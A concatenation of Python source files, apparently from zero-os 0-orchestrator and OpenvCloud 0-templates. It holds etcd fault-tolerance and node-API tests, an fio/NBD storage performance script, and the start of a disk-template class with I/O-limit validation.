self.disks = [{"vdiskid": self.vdisk['id'], "maxIOps": 2000}]
self.lg.info('[*]Get number of nodes (n)')
self.number_of_nodes = len(self.nodes_info)
self.lg.info('[*] Check that etcd process is running in n of nodes if n odd,and (n-1) of nodes if n even')
self.nodes_with_etcd=[]
for node in self.nodes_info:
node_client = self.Client(node["ip"], password=self.jwt)
response = node_client.client.bash("ps xu | grep [e]tcd").get()
if response.state == "SUCCESS":
self.nodes_with_etcd.append(node)
if len(self.nodes_info)%2 == 0:
self.lg.info("[*]number of nodes even")
self.assertEqual(len(self.nodes_with_etcd), self.number_of_nodes-1)
else:
self.lg.info("[*]number of nodes odd")
self.assertEqual(len(self.nodes_with_etcd), self.number_of_nodes)
def test001_kill_etcdcluster_less_than_tolerance(self):
""" GAT-150
**Test Scenario:**
#. Check that etcd process is running in all nodes if number of nodes odd.
#. Check that etcd process is running in (n-1) nodes if number of nodes even.
#. Kill etcd_cluster in less than or equal (n-1)/2 nodes ,should succeed.
#. Check that etcd process return back in this nodes, should succeed.
#. Create (VM0),should succeed.
#. Get (VM0) details ,(VM0) status should be running.
"""
self.lg.info(" Kill etcd_cluster in less than (n-1)/2 nodes")
tolerance = int((len(self.nodes_with_etcd)-1)/2)
for i in range(tolerance):
node_client = self.Client(self.nodes_with_etcd[i]["ip"], password=self.jwt)
response = node_client.client.bash("ps xu | grep [e]tcd | awk '{ print $1 }'").get()
self.assertEqual(response.state, "SUCCESS")
response = node_client.client.bash(" kill -9 %s"%response.stdout).get()
self.assertEqual(response.state, "SUCCESS")
self.lg.info(" Check that etcd process return back in this nodes, should succeed. ")
for i in range(tolerance):
for _ in range(5):
time.sleep(5)
node_client = self.Client(self.nodes_with_etcd[i]["ip"], password=self.jwt)
response = node_client.client.bash("ps xu | grep [e]tcd | awk '{ print $1 }'").get()
if response.stdout == " ":
continue
break
else:
self.assertTrue(False, "etcd_cluster doesn't work again for node %s"%self.nodes_with_etcd[i]["id"])
self.lg.info("Create (VM0),should succeed.")
self.response, self.data = self.vms_api.post_nodes_vms(node_id=self.nodeid, disks=self.disks)
self.assertEqual(self.response.status_code, 201)
self.lg.info("Get (VM0) details ,(VM0) status should be running.")
for _ in range(20):
response = self.vms_api.get_nodes_vms_vmid(self.nodeid, self.data['id'])
self.assertEqual(response.status_code, 200)
status = response.json()['status']
if status == 'running':
break
else:
time.sleep(3)
else:
self.assertEqual(response.json()['status'], 'running', " [*] can't start vm.")
@unittest.skip("https://github.com/zero-os/0-orchestrator/issues/1196")
def test002_kill_etcdcluster_more_than_tolerance(self):
""" GAT-151
**Test Scenario:**
#. Check that etcd process run in all nodes if number of nodes odd.
#. Check that etcd process run in (n-1) nodes if number of nodes even.
#. kill etcd process in more than (n-1)/2 nodes ,should succeed.
#. Check that etcd process recovered in same numbers of nodes before killing etcd.
#. Create (VM0),should succeed.
#. Get (VM0) details ,(VM0) status should be running.
"""
self.lg.info(" Kill etcd process in more than (n-1)/2 nodes")
tolerance = int((len(self.nodes_with_etcd)-1)/2)
for i in range(tolerance+1):
node_client = self.Client(self.nodes_with_etcd[i]["ip"], password=self.jwt)
response = node_client.client.bash("ps xu | grep [e]tcd | awk '{ print $1 }'").get()
self.assertEqual(response.state, "SUCCESS")
response = node_client.client.bash(" kill -9 %s"%response.stdout).get()
self.assertEqual(response.state, "SUCCESS")
self.lg.info(" Check that etcd process recovered in same numbers of nodes before killing etcd")
recoverd_etcd = []
for i in range(self.number_of_nodes):
node_client = self.Client(self.nodes_info[i]["ip"], password=<PASSWORD>)
for _ in range(5):
time.sleep(5)
response = node_client.client.bash("ps xu | grep [e]tcd | grep [r]ecovered ").get()
if "recovered" not in response.stdout:
continue
recoverd_etcd.append(self.nodes_info[i])
break
if (len(recoverd_etcd) == len(self.nodes_with_etcd)):
break
else:
self.assertEqual(len(recoverd_etcd), len(self.nodes_with_etcd))
self.lg.info("Create (VM0),should succeed.")
self.response, self.data = self.vms_api.post_nodes_vms(node_id=self.nodeid, memory=1024, cpu=1, disks=self.disks)
self.assertEqual(self.response.status_code, 201)
self.lg.info("Get (VM0) details ,(VM0) status should be running.")
for _ in range(20):
response = self.vms_api.get_nodes_vms_vmid(self.nodeid, self.data['id'])
self.assertEqual(response.status_code, 200)
status = response.json()['status']
if status == 'running':
break
else:
time.sleep(3)
else:
self.assertEqual(response.json()['status'], 'running', " [*] can't start vm.")
```
#### File: testcases/basic_tests/test01_nodeid_apis.py
```python
import random
from testcases.testcases_base import TestcasesBase
import unittest
class TestNodeidAPI(TestcasesBase):
def test001_list_nodes(self):
""" GAT-001
*GET:/node/ Expected: List of all nodes*
**Test Scenario:**
#. Send get nodes api request.
#. Compare results with golden value.
"""
self.lg.info('send get nodes api request ')
response = self.nodes_api.get_nodes()
self.assertEqual(response.status_code, 200)
self.lg.info('Compare results with golden value.')
Running_nodes = []
Nodes_result = response.json()
for node in Nodes_result:
if node['status'] == 'running':
Running_nodes.append(node)
self.assertEqual(len(Running_nodes), len(self.nodes_info))
for node in Running_nodes:
node_info = [item for item in self.nodes_info if item["id"] == node["id"]]
self.assertEqual(len(node_info), 1)
for key in node.keys():
if key in node_info[0].keys():
self.assertEqual(node[key], node_info[0][key])
def test002_get_nodes_details(self):
""" GAT-002
*GET:/nodes/{nodeid} - Expected: id, status, hostname*
**Test Scenario:**
#. Choose one random node of list of running nodes.
#. Send get nodes/{nodeid} api request.
#. Compare results with golden value.
"""
self.lg.info(' Send get nodes/{nodeid} api request.')
response = self.nodes_api.get_nodes_nodeid(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('Compare results with golden value.')
node_details = response.json()
node_info = [x for x in self.nodes_info if x["id"] == self.nodeid][0]
for key in node_info.keys():
if key in node_details.keys():
self.assertEqual(node_info[key], node_details[key])
def test003_list_jobs(self):
""" GAT-003
*GET:/nodes/{nodeid}/jobs - Expected: job list items*
**Test Scenario:**
#. Choose one random node of list of running nodes.
#. Send get /nodes/{nodeid}/jobs api request.
#. Compare results with golden value.
"""
self.lg.info('Send get /nodes/{nodeid}/jobs api request.')
response = self.nodes_api.get_nodes_nodeid_jobs(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('Compare results with golden value.')
jobs = response.json()
client_jobs = self.core0_client.get_jobs_list()
self.assertEqual(len(jobs), len(client_jobs))
for job in jobs:
for client_job in client_jobs:
if job['id'] == client_job['id']:
self.assertEqual(job['startTime'], client_job['starttime'])
break
def test004_kill_jobs(self):
""" GAT-004
*DELETE:/nodes/{nodeid}/jobs *
**Test Scenario:**
#. Choose one random node of list of running nodes.
#. Send get /nodes/{nodeid}/jobs api request.
#. Check that all jobs has been killed.
"""
self.lg.info(' Send get /nodes/{nodeid}/jobs api request.')
response = self.nodes_api.delete_nodes_nodeid_jobs(node_id=self.nodeid)
self.assertEqual(response.status_code, 204)
self.lg.info('Check that all jobs has been killed.')
response = self.nodes_api.get_nodes_nodeid_jobs(node_id=self.nodeid)
jobs_list = response.json()
self.assertGreater(len(jobs_list), 5)
def test005_get_job_details(self):
""" GAT-005
*GET:/nodes/{nodeid}/jobs/{jobid} *
**Test Scenario:**
#. Choose one random node of list of running nodes.
#. Get list of jobs of this node .
#. Choose one of these jobs to list its details.
#. Send get /nodes/{nodeid}/jobs/{jobid} api request.
#. Compare response with the golden values.
"""
self.lg.info('Get list of jobs of this node .')
response = self.nodes_api.get_nodes_nodeid_jobs(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('Choose one of these jobs to list its details.')
jobs_list = response.json()
job_id = jobs_list[random.randint(0, (len(jobs_list) - 1))]['id']
self.lg.info('Send get /nodes/{nodeid}/jobs/{jobid} api request.')
response = self.nodes_api.get_nodes_nodeid_jobs_jobid(node_id=self.nodeid, job_id=job_id)
self.assertEqual(response.status_code, 200)
self.lg.info('Compare response with the golden values.')
job_details = response.json()
client_jobs = self.core0_client.get_jobs_list()
for client_job in client_jobs:
if client_job['id'] == job_id:
for key in job_details.keys():
if key in client_job.keys():
self.assertEqual(job_details[key], client_job[key])
break
def test006_kill_specific_job(self):
""" GAT-006
*DELETE:/nodes/{nodeid}/jobs/{jobid} *
**Test Scenario:**
#. Start new job .
#. delete /nodes/{nodeid}/jobs/{jobid} api.
#. verify this job has been killed.
"""
self.lg.info('start new job ')
job_id = self.core0_client.start_job()
self.assertTrue(job_id)
self.lg.info(' delete /nodes/{nodeid}/jobs/{jobid} api.')
response = self.nodes_api.delete_nodes_nodeid_jobs_jobid(node_id=self.nodeid, job_id=job_id)
self.assertEqual(response.status_code, 204)
self.lg.info("verify this job has been killed.")
jobs = self.core0_client.get_jobs_list()
self.assertFalse(any(job['id'] == job_id for job in jobs))
def test007_ping_specific_node(self):
""" GAT-007
*POST:/nodes/{nodeid}/ping *
**Test Scenario:**
#. Choose one random node of list of running nodes.
#. Post /nodes/{nodeid}/ping api.
#. Check response status code.
"""
self.lg.info('post /nodes/{nodeid}/ping api.')
response = self.nodes_api.post_nodes_nodeid_ping(node_id=self.nodeid)
self.lg.info('check response status code.')
self.assertEqual(response.status_code, 200)
def test008_get_node_state(self):
""" GAT-008
*GET:/nodes/{nodeid}/state *
**Test Scenario:**
#. Choose one random node of list of running nodes.
#. Get /nodes/{nodeid}/state api.
#. Compare response data with the golden values.
"""
self.lg.info(' get /nodes/{nodeid}/state api.')
response = self.nodes_api.get_nodes_nodeid_state(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('Compare response data with the golden values.')
client_state = self.core0_client.get_node_state()
node_state = response.json()
for key in node_state.keys():
if key in client_state.keys():
self.assertAlmostEqual(node_state[key],
client_state[key],
delta=6000000, msg='different value for key%s' % key)
def test010_get_cpus_details(self):
""" GAT-010
*GET:/nodes/{nodeid}/cpus *
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. get /nodes/{nodeid}/cpus api.
#. compare response data with the golden values.
"""
self.lg.info('get /nodes/{nodeid}/cpus api.')
response = self.nodes_api.get_nodes_nodeid_cpus(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('compare response data with the golden values.')
result = self.core0_client.get_nodes_cpus()
cpus_info = response.json()
for i, cpu_info in enumerate(cpus_info):
for key in cpu_info.keys():
if key in result[i].keys():
if key != 'cores' and key != 'mhz':
self.assertEqual(cpu_info[key], result[i][key], "different cpu info for key %s" % key)
def test011_get_disks_details(self):
""" GAT-011
*GET:/nodes/{nodeid}/disks *
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. Get /nodes/{nodeid}/disks api.
#. Compare response data with the golden values.
"""
self.lg.info('get /nodes/{nodeid}/disks api.')
response = self.nodes_api.get_nodes_nodeid_disks(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
disks_info = response.json()
self.lg.info('compare response data with the golden values.')
result = self.core0_client.get_nodes_disks()
self.assertEqual(result, disks_info)
def test012_get_memmory_details(self):
""" GAT-012
*GET:/nodes/{nodeid}/mem *
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. get /nodes/{nodeid}/mem api.
#. compare response data with the golden values.
"""
self.lg.info('get /nodes/{nodeid}/mem api.')
response = self.nodes_api.get_nodes_nodeid_mem(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('compare response data with the golden values.')
result = self.core0_client.get_nodes_mem()
memory_info = response.json()
for key in memory_info.keys():
if key in result.keys():
self.assertAlmostEqual(memory_info[key], result[key],
msg="different keys%s" % key,
delta=10000000)
def test013_get_nics_details(self):
""" GAT-013
*GET:/nodes/{nodeid}/nics - network interface information*
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. Get /nodes/{nodeid}/nics api.
#. compare response data with the golden values.
"""
self.lg.info('get /nodes/{nodeid}/nics api.')
response = self.nodes_api.get_nodes_nodeid_nics(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('compare response data with the golden values.')
golden_result = self.core0_client.get_nodes_nics()
nics_info = response.json()
self.assertEqual(len(nics_info), len(golden_result))
for nic_info in nics_info:
for nic_result in golden_result:
if nic_result['name'] == nic_info['name']:
for key in nic_info.keys():
if key in nic_result.keys():
self.assertEqual(nic_info[key], nic_result[key],
'different value for key %s' % key)
break
def test014_get_os_info_details(self):
""" GAT-014
*GET:/nodes/{nodeid}/info - os information*
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. Get /nodes/{nodeid}/info api.
#. ompare response data with the golden values.
"""
self.lg.info('Get /nodes/{nodeid}/info api.')
response = self.nodes_api.get_nodes_nodeid_info(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('compare response data with the golden values.')
result = self.core0_client.get_nodes_info()
node_info = response.json()
for key in node_info.keys():
if key in result.keys():
self.assertEqual(node_info[key], result[key])
def test015_list_processes(self):
""" GAT-015
*GET:/nodes/{nodeid}/process *
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. get /nodes/{nodeid}/processes api.
#. compare response data with the golden values.
"""
self.lg.info('Get /nodes/{nodeid}/process api.')
response = self.nodes_api.get_nodes_nodeid_processes(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('compare response data with the golden values.')
processes = {}
client_processes = {}
client_result = self.core0_client.get_processes_list()
for process in client_result:
client_processes[process['pid']] = process
for process in response.json():
processes[process['pid']] = process
skip_keys = ['<KEY>
for process_id in processes.keys():
process_info = processes[process_id]
for info in process_info.keys():
if info not in skip_keys:
if info in client_processes[process_id].keys():
self.assertEqual(process_info[info],
client_processes[process_id][info],
"different value with key%s" % info)
def test016_get_process_details(self):
""" GAT-016
*GET:/nodes/{nodeid}/processes/{processid} *
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. Get list of running processes
#. choose one of them.
#. Get /nodes/{nodeid}/processes/{processid} api.
#. compare response data with the golden values.
"""
self.lg.info('Get list of running processes')
response = self.nodes_api.get_nodes_nodeid_processes(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
processes_list = response.json()
self.lg.info('Choose one of these processes to list its details.')
process_id = processes_list[random.randint(0, len(processes_list) - 1)]['pid']
self.lg.info('Get /nodes/{nodeid}/process/{processid} api.')
response = self.nodes_api.get_nodes_nodeid_processes_processid(node_id=self.nodeid, process_id=str(process_id))
self.assertEqual(response.status_code, 200)
self.lg.info('Compare response data with the golden values.')
process_info = response.json()
client_result = self.core0_client.get_processes_list()
for process in client_result:
if process['pid'] == process_info['pid']:
for info in process_info.keys():
if info != 'cpu':
if info in process.keys():
self.assertEqual(process_info[info], process[info],
"different value with key%s" % info)
break
def test017_delete_process(self):
""" GAT-017
*DELETE:/nodes/{nodeid}/processes/{processid} *
**Test Scenario:**
#. Start new process.
#. Delete /nodes/{nodeid}/processes/{processid} api.
#. Make sure that this process has been killed.
"""
self.lg.info('Start new process.')
process_id = self.core0_client.start_process()
self.assertTrue(process_id)
self.lg.info('delete /nodes/{nodeid}/processes/{processid} api.')
response = self.nodes_api.delete_nodes_nodeid_process_processid(node_id=self.nodeid,
process_id=str(process_id))
self.assertEqual(response.status_code, 204)
self.lg.info('Make sure that this process has been killed.')
client_processes = self.core0_client.get_processes_list()
self.assertFalse(any(process['pid'] == process_id for process in client_processes))
```
#### File: tests/performance/bd-performance.py
```python
import os
import json
import click
import logging
import time
import yaml
from io import BytesIO
from zeroos.core0.client import Client as Client0
from zeroos.orchestrator import client as apiclient
os.environ['LC_ALL'] = 'C.UTF-8'
os.environ['LANG'] = 'C.UTF-8'
logging.basicConfig(level=logging.INFO)
@click.command()
@click.option('--orchestratorserver', required=True, help='0-orchestrator api server endpoint. Eg http://192.168.193.212:8080')
@click.option('--jwt', required=True, help='jwt')
@click.option('--storagecluster', required=True, help='Name of the storage cluster in which the vdisks need to be created')
@click.option('--vdiskCount', required=True, type=int, help='Number of vdisks that need to be created')
@click.option('--vdiskSize', required=True, type=int, help='Size of disks in GB')
@click.option('--runtime', required=True, type=int, help='Time fio should be run')
@click.option('--vdiskType', required=True, type=click.Choice(['boot', 'db', 'cache', 'tmp']), help='Type of disk')
@click.option('--resultDir', required=True, help='Results directory path')
@click.option('--nodeLimit', type=int, help='Limit the number of nodes')
def test_fio_nbd(orchestratorserver, jwt, storagecluster, vdiskcount, vdisksize, runtime, vdisktype, resultdir, nodelimit):
"""Creates a storagecluster on all the nodes in the resourcepool"""
api = apiclient.APIClient(orchestratorserver)
api.set_auth_header("Bearer %s" % jwt)
logging.info("Discovering nodes in the cluster ...")
nodes = api.nodes.ListNodes().json()
nodes = [node for node in nodes if node["status"] == "running"]
nodelimit = nodelimit if nodelimit is None or nodelimit <= len(nodes) else len(nodes)
if nodelimit is not None:
if vdiskcount < nodelimit:
raise ValueError("Vdisk count should be at least the same as number of nodes")
elif vdiskcount < len(nodes):
raise ValueError("Vdisk count should be at least the same as number of nodes")
vdiskcount = int(vdiskcount / len(nodes)) if nodelimit is None else int(vdiskcount / nodelimit)
logging.info("Found %s ready nodes..." % (len(nodes)))
nodeIDs = [node['id'] for node in nodes]
nodeIPs = [node['ipaddress'] for node in nodes]
if nodelimit:
nodeIDs = nodeIDs[:nodelimit]
nodeIPs = nodeIPs[:nodelimit]
deployInfo = {}
try:
deployInfo, vdisks = deploy(api, nodeIDs, nodeIPs, orchestratorserver, storagecluster, vdiskcount, vdisksize, vdisktype, jwt)
mountVdisks(deployInfo, nodeIDs, nodeIPs, jwt)
cycle = 0
while runtime:
if runtime < 3600:
cycle_time = runtime
runtime = 0
else:
cycle_time = 3600
runtime -= 3600
cycle += 1
cycle_dir = os.path.join(resultdir, str(cycle))
os.makedirs(cycle_dir, exist_ok=True)
test(deployInfo, nodeIDs, cycle_time, nodeIPs, jwt)
waitForData(nodeIDs, deployInfo, cycle_time, cycle_dir, nodeIPs, jwt)
except Exception as e:
raise RuntimeError(e)
finally:
cleanUp(nodeIPs, nodeIDs, deployInfo, jwt, vdisks)
def StartContainerJob(api, **kwargs):
res = api.nodes.StartContainerJob(**kwargs)
return res.headers["Location"].split("/")[-1]
def waitForData(nodeIDs, deployInfo, runtime, resultdir, nodeIPs, jwt):
os.makedirs(resultdir, exist_ok=True)
for idx, nodeID in enumerate(nodeIDs):
nodeClient = Client0(nodeIPs[idx], password=jwt)
start = time.time()
while start + (runtime + 120) > time.time():
try:
testcontainerId = deployInfo[nodeID]["testContainer"]
containerclient = nodeClient.container.client(testcontainerId)
filepath = '/%s.test.json' % nodeID
buff = BytesIO()
containerclient.filesystem.download(filepath, buff)
except:
time.sleep(1)
else:
if buff.getvalue() == b'':
time.sleep(5)
continue
file = '%s/%s.test.json' % (resultdir, nodeID)
logging.info("Saving test data in %s ..." % file)
with open(file, 'wb') as outfile:
outfile.write(buff.getvalue())
break
def mountVdisks(deployInfo, nodeIDs, nodeIPs, jwt):
for idx, nodeID in enumerate(nodeIDs):
nodeClient = Client0(nodeIPs[idx], password=<PASSWORD>)
testcontainerId = deployInfo[nodeID]["testContainer"]
nbdConfig = deployInfo[nodeID]["nbdConfig"]
deployInfo[nodeID]["nbdClientInfo"] = nbdClientConnect(nodeClient, nodeID, testcontainerId, nbdConfig)
def test(deployInfo, nodeIDs, runtime, nodeIPs,jwt ):
for idx, nodeID in enumerate(nodeIDs):
nodeClient = Client0(nodeIPs[idx], password=<PASSWORD>)
testcontainerId = deployInfo[nodeID]["testContainer"]
clientInfo = deployInfo[nodeID]["nbdClientInfo"]
filenames = clientInfo["filenames"]
client_pids = clientInfo["client_pids"]
deployInfo[nodeID]["filenames"] = filenames
deployInfo[nodeID]["clientPids"] = client_pids
fioCommand = ' /bin/fio \
--iodepth 16\
--ioengine libaio\
--size 100000000000M\
--readwrite randrw \
--rwmixwrite 20 \
--filename {filenames} \
--runtime {runtime} \
--output {nodeID}.test.json\
--numjobs {length} \
--name test1 \
--group_reporting \
--output-format=json \
--direct 1 \
'.format(filenames=filenames, runtime=runtime, nodeID=nodeID, length=len(filenames.split(":")) * 2)
containerclient = nodeClient.container.client(testcontainerId)
containerclient.system(fioCommand)
def cleanUp(nodeIPs, nodeIDs, deployInfo, jwt, vdisks):
logging.info("Cleaning up...")
for idx, nodeID in enumerate(nodeIDs):
nodeClient = Client0(nodeIPs[idx], password=<PASSWORD>)
if deployInfo.get(nodeID, None):
nbdConfig = deployInfo[nodeID]["nbdConfig"]
nbdContainerId = deployInfo[nodeID]["nbdContainer"]
nbdcontainerclient = nodeClient.container.client(nbdContainerId)
testContainerId = deployInfo[nodeID]["testContainer"]
testContainerclient = nodeClient.container.client(testContainerId)
filenames = deployInfo[nodeID]["filenames"]
client_pids = deployInfo[nodeID]["clientPids"]
# Disconnecting nbd disks
for idx, filename in enumerate(filenames.split(":")):
disconnectDiskCommand = '/bin/nbd-client \
-d {filename} \
'.format(filename=filename)
job = testContainerclient.bash(disconnectDiskCommand)
job.get()
if job.exists:
testContainerclient.job.kill(client_pids[idx])
deleteDiskCommand = '/bin/zeroctl \
delete \
vdisks \
{vdisks}\
--config {configpath} \
'.format(vdisks=','.join(vdisks[nodeID]), configpath=nbdConfig["configpath"])
response = nbdcontainerclient.system(deleteDiskCommand).get()
if response.state != "SUCCESS":
raise RuntimeError("Command %s failed to execute successfully. %s" % (deleteDiskCommand, response.stderr))
nodeClient.container.terminate(testContainerId)
nodeClient.container.terminate(nbdContainerId)
def deploy(api, nodeIDs, nodeIPs, orchestratorserver, storagecluster, vdiskcount, vdisksize, vdisktype, jwt):
deployInfo = {}
storageclusterInfo = getStorageClusterInfo(api, storagecluster)
vdisks = {}
for idx, nodeID in enumerate(nodeIDs):
# Create filesystem to be shared amongst fio and nbd server contianers
fss = _create_fss(orchestratorserver, api, nodeID)
# Create block device container and start nbd
nbdContainer = "nbd_{}".format(str(time.time()).replace('.', ''))
nbdFlist = "https://hub.gig.tech/gig-official-apps/0-disk-master.flist"
nodeClient = Client0(nodeIPs[idx], password=<PASSWORD>)
nbdcontainerId = createContainer(nodeClient, orchestratorserver, api, nodeID, fss, nbdFlist, nbdContainer)
containerclient = nodeClient.container.client(nbdcontainerId)
nbdConfig, vdiskIds= startNbd(containerclient=containerclient,
nodeID=nodeID,
storagecluster=storagecluster,
fs=fss,
containername=nbdContainer,
vdiskCount=vdiskcount,
vdiskSize=vdisksize,
vdiskType=vdisktype,
storageclusterInfo=storageclusterInfo)
vdisks[nodeID] = vdiskIds
# Create and setup the test container
testContainer = "bptest_{}".format(str(time.time()).replace('.', ''))
fioFlist = "https://hub.gig.tech/gig-official-apps/performance-test.flist"
testcontainerId = createContainer(nodeClient, orchestratorserver, api, nodeID, fss, fioFlist, testContainer)
# Load nbd kernel module
response = nodeClient.system("modprobe nbd nbds_max=512").get()
if response.state != "SUCCESS":
raise ValueError("can't load nbd in node %s" % (nodeID))
deployInfo[nodeID] = {
"nbdContainer": nbdcontainerId,
"testContainer": testcontainerId,
"nbdConfig": nbdConfig,
}
return deployInfo, vdisks
def getStorageClusterInfo(api, storagecluster):
logging.info("Getting storagecluster info...")
storageclusterInfo = api.storageclusters.GetClusterInfo(storagecluster).json()
datastorages = []
metadatastorage = ''
clusterconfig = {
'dataStorage': [],
}
for storage in storageclusterInfo.get('dataStorage', []):
datastorages.append("%s:%s" % (storage['ip'], storage['port']))
clusterconfig['dataStorage'].append({"address": "%s:%s" % (storage['ip'], storage['port'])})
for storage in storageclusterInfo.get('metadataStorage', []):
metadatastorage = "%s:%s" % (storage['ip'], storage['port'])
clusterconfig['metadataStorage'] = {"address": "%s:%s" % (storage['ip'], storage['port'])}
return {
"clusterconfig": clusterconfig,
"datastorage": datastorages,
"metadatastorage": metadatastorage,
}
def startNbd(containerclient, nodeID, storagecluster, fs, containername, vdiskCount, vdiskSize, vdiskType, storageclusterInfo):
# Start nbd servers
fs = fs.replace(':', os.sep)
socketpath = '/fs/{}/server.socket.{}'.format(fs, containername)
configpath = "/{}.config".format(containername)
config = {
'storageClusters': {storagecluster: storageclusterInfo["clusterconfig"]},
'vdisks': {},
}
vdiskIDs = []
for i in range(vdiskCount):
# Run nbd
vdiskID = "testvdisk_{}".format(str(time.time()).replace('.', ''))
vdiskIDs.append(vdiskID)
vdiskconfig = {
'blockSize': 4096,
'readOnly': False,
'size': vdiskSize,
'nbd': {"storageClusterID": storagecluster},
'type': vdiskType
}
config['vdisks'][vdiskID] = vdiskconfig
yamlconfig = yaml.safe_dump(config, default_flow_style=False)
yamlconfig = yamlconfig.encode("utf8")
###
bytes = BytesIO(yamlconfig)
containerclient.filesystem.upload(configpath, bytes)
nbdCommand = '/bin/nbdserver \
-protocol unix \
-address "{socketpath}" \
-config "{configpath}" \
'.format(socketpath=socketpath, configpath=configpath)
nbdjob = containerclient.system(nbdCommand)
jobId = nbdjob.id
logging.info("Starting nbdserver on node: %s", nodeID)
nbdConfig = {
"socketpath": socketpath,
"datastorage": storageclusterInfo["datastorage"],
"metadatastorage": storageclusterInfo["metadatastorage"],
"pid": jobId,
"vdisks": vdiskIDs,
"configpath": configpath,
}
logging.info("Waiting for 10 seconds to evaluate nbdserver processes")
time.sleep(10)
if not nbdjob.running:
raise ValueError("nbd server on node %s is not in a valid state" % (nodeID))
return nbdConfig, vdiskIDs
def createContainer(nodeClient, orchestratorserver, cl, nodeID, fs, flist, hostname):
logging.info(
"Creating new container %s" % (hostname))
fss = "/fs/{}".format(fs.replace(':', os.sep))
mntdir = "/mnt/storagepools/{}/filesystems/{}".format(fs[:fs.find(':')], fs[fs.find(':')+1:])
mount = {mntdir: fss}
containerId = nodeClient.container.create(root_url=flist,
host_network=True,
mount=mount,
nics=[],
port=None,
hostname=hostname,
privileged=True,
name=hostname
).get()
if not containerId:
raise ValueError("can't create container %s" % (hostname))
return containerId
def nbdClientConnect(nodeClient, nodeID, testcontainerId, nbdConfig):
containerclient = nodeClient.container.client(testcontainerId)
filenames = ''
client_pids = []
for idx, val in enumerate(nbdConfig["vdisks"]):
nbdDisk = '/dev/nbd%s' % idx
nbdClientCommand = '/bin/nbd-client \
-N {val} \
-u {nbdConfig} \
{nbdDisk} \
-b 4096 \
'.format(val=val, nbdConfig=nbdConfig['socketpath'], nbdDisk=nbdDisk)
response = containerclient.system(nbdClientCommand).get()
if response.state != "SUCCESS":
raise RuntimeError("Command %s failed to execute successfully. %s" % (nbdClientCommand, response.stderr))
filenames = nbdDisk if filenames == '' else '%s:%s' % (filenames, nbdDisk)
client_pids.append(response.id)
return {"filenames": filenames, "client_pids": client_pids}
def _create_fss(orchestratorserver, cl, nodeID):
pool = "{}_fscache".format(nodeID)
fs_id = "fs_{}".format(str(time.time()).replace('.', ''))
fs = apiclient.FilesystemCreate.create(name=fs_id,
quota=0,
readOnly=False)
req = json.dumps(fs.as_dict(), indent=4)
link = "POST /nodes/{nodeid}/storagepools/{pool}/filesystems".format(nodeid=nodeID, pool=pool)
logging.info("Sending the following request to the /filesystem api:\n{}\n\n{}".format(link, req))
res = cl.nodes.CreateFilesystem(nodeid=nodeID, storagepoolname=pool, data=fs)
logging.info(
"Creating new filesystem...\n You can follow here: %s%s" % (orchestratorserver, res.headers['Location']))
return "{}:{}".format(pool, fs_id)
if __name__ == "__main__":
test_fio_nbd()
``` |
{
"source": "5l1v3r1/0-templates",
"score": 2
} |
#### File: templates/disk/disk.py
```python
from js9 import j
from zerorobot.template.base import TemplateBase
from zerorobot.template.state import StateCheckError
class Disk(TemplateBase):
version = '0.0.1'
template_name = "disk"
OVC_TEMPLATE = 'github.com/openvcloud/0-templates/openvcloud/0.0.1'
ACCOUNT_TEMPLATE = 'github.com/openvcloud/0-templates/account/0.0.1'
VDC_TEMPLATE = 'github.com/openvcloud/0-templates/vdc/0.0.1'
def __init__(self, name, guid=None, data=None):
super().__init__(name=name, guid=guid, data=data)
self._ovc = None
self._account = None
self._config = None
self._space = None
def validate(self):
"""
Validate service data received during creation
"""
if not self.data['vdc']:
raise ValueError('vdc service name is required')
if not self.data['diskId'] and not self.data['name']:
raise ValueError('provide name to create a new device')
# ensure that disk has a valid type
if self.data['type'].upper() not in ["D", "B"]:
raise ValueError("disk type must be data D or boot B only")
self._validate_limits()
def _validate_limits(self):
"""
Validate limits on the Disk
"""
data = self.data
# ensure that limits are given correctly
if (data['maxIops'] or data['totalIopsSec']) and (data['readIopsSec'] or data['writeIopsSec']):
raise RuntimeError("total and read/write of iops_sec cannot be set at the same time")
if data['totalBytesSec'] and (data['readBytesSec'] or data['writeBytesSec']):
raise RuntimeError("total and read/write of bytes_sec cannot be set at the same time")
if data['totalBytesSecMax'] and (data['readBytesSecMax'] or data['writeBytesSecMax']):
raise RuntimeError("total and read/write of bytes_sec_max cannot be set at the same time")
if data['totalIopsSecMax'] and (data['readIopsSecMax'] or data['writeIopsSecMax']):
raise RuntimeError("total and read/write of iops_sec_max cannot be set at the same time")
def update(self, maxIops=None, totalBytesSec=None, readBytesSec=None,
writeBytesSec=None, totalIopsSec=None, readIopsSec=None,
writeIopsSec=None, totalBytesSecMax=None, readBytesSecMax=None,
writeBytesSecMax=None, totalIopsSecMax=None, readIopsSecMax=None,
writeIopsSecMax=None, sizeIopsSec=None):
""" Update limits
Interpretation of argument values:
:value 0: unset limit
:value None: parameter was not provided in the action data and limit will not be updated
:other values: update of the limit
"""
self.state.check('actions', 'install', 'ok')
updated = []
updated.append(self._update_value('maxIops', maxIops))
updated.append(self._update_value('totalBytesSec', totalBytesSec))
updated.append(self._update_value('readBytesSec', readBytesSec))
updated.append(self._update_value('writeBytesSec', writeBytesSec))
updated.append(self._update_value('totalIopsSec', totalIopsSec))
updated.append(self._update_value('readIopsSec', readIopsSec))
updated.append(self._update_value('writeIopsSec', writeIopsSec))
updated.append(self._update_value('totalBytesSecMax', totalBytesSecMax))
updated.append(self._update_value('readBytesSecMax', readBytesSecMax))
updated.append(self._update_value('writeBytesSecMax', writeBytesSecMax))
